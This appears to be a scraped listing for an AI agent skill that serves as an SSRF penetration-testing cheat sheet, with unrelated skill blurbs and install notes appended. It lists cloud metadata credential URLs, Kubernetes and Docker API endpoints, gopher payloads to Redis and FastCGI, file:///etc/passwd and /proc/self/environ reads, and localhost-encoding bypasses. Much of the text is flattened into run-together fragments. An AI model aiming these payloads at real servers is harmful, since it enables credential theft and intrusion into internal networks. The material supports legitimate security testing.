Strix SSRF 测试手册,覆盖云元数据访问、内网服务发现与协议走私;触发名:strix-ssrf
npx skills add https://github.com/asdfgh1445/ctf-super-hub --skill Strix•SSRF 测试
Server-Side Request Forgery enables the server to reach networks and services the attacker cannot. Focus on cloud metadata endpoints, service meshes, Kubernetes, and protocol abuse to turn a single fetch into credentials, lateral movement, and sometimes RCE.
Scope
Direct URL Params
url=, link=, fetch=, src=, webhook=, avatar=, image=Indirect Sources
Protocol-Translating Services
Less Obvious
http://169.254.169.254/latest/meta-data/ → /iam/security-credentials/{role}, /user-data/latest/api/token with header X-aws-ec2-metadata-token-ttl-seconds, then include X-aws-ec2-metadata-token on subsequent GETshttp://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URIhttp://metadata.google.internal/computeMetadata/v1/Metadata-Flavor: Google/instance/service-accounts/default/tokenhttp://169.254.169.254/metadata/instance?api-version=2021-02-01Metadata: true/metadata/identity/oauth2/token/pods, /metrics, exec/attach endpointshttps://kubernetes.default.svc/svc.cluster.local) and default services (kube-dns, metrics-server)http://localhost:2375/v1.24/containers/json (no TLS variants often internal-only)dict://localhost:11211/stat, gopher payloads to Redis on 6379http://localhost:9200/_cat/indicesgopher://localhost:9000/ (craft records for file write/exec when app routes to FPM)Gopher
File and Wrappers
file:///etc/passwd, file:///proc/self/environ when libraries allow file handlersjar:, netdoc:, smb:// and language-specific wrappers (php://, expect://) where enabled127.0.0.1, 127.1, 2130706433, 0x7f000001, ::1, [::ffff:127.0.0.1]http://internal@attacker/ or http://attacker#@internal///169.254.169.254/internal. vs INTERNAL, Unicode dot lookalikesAddress Encoding
DNS Rebinding
URL Parser Differentials
Redirect Chains
Any feature that fetches remote content on behalf of a user is a potential tunnel to internal networks and control planes. Bind scheme/host/port/headers explicitly or expect an attacker to route through them.
Toolkit for interacting with and testing local web applications using Playwright. Supports verifying frontend functionality, debugging UI behavior, capturing browser screenshots, and viewing browser logs.
Use when implementation is complete, all tests pass, and you need to decide how to integrate the work - guides completion of development work by presenting structured options for merge, PR, or cleanup
Use when implementing any feature or bugfix, before writing implementation code
Use when encountering any bug, test failure, or unexpected behavior, before proposing fixes
Use when about to claim work is complete, fixed, or passing, before committing or creating PRs - requires running verification commands and confirming output before making any success claims; evidence before assertions always
Expert guidance for systematic backtesting of trading strategies. Use when developing, testing, stress-testing, or validating quantitative trading strategies. Covers "beating ideas to death" methodology, parameter robustness testing, slippage modeling, bias prevention, and interpreting backtest results. Applicable when user asks about backtesting, strategy validation, robustness testing, avoiding overfitting, or systematic trading development.
Cloud laboratory platform for automated protein testing and validation. Use when designing proteins and needing experimental validation including binding assays, expression testing, thermostability measurements, enzyme activity assays, or protein sequence optimization. Also use for submitting experiments via API, tracking experiment status, downloading results, optimizing protein sequences for better expression using computational tools (NetSolP, SoluProt, SolubleMPNN, ESM), or managing protein design workflows with wet-lab validation.
This skill should be used for time series machine learning tasks including classification, regression, clustering, forecasting, anomaly detection, segmentation, and similarity search. Use when working with temporal data, sequential patterns, or time-indexed observations requiring specialized algorithms beyond standard ML approaches. Particularly suited for univariate and multivariate time series analysis with scikit-learn compatible APIs.
Take asdfgh1445/strix•ssrf 测试 from the repository into ~/.claude/skills for personal
use, or into .claude/skills inside a project.
The agent identifies a skill by the name field in its header. Two skills with the
same name cannot sit side by side — one of them will be ignored.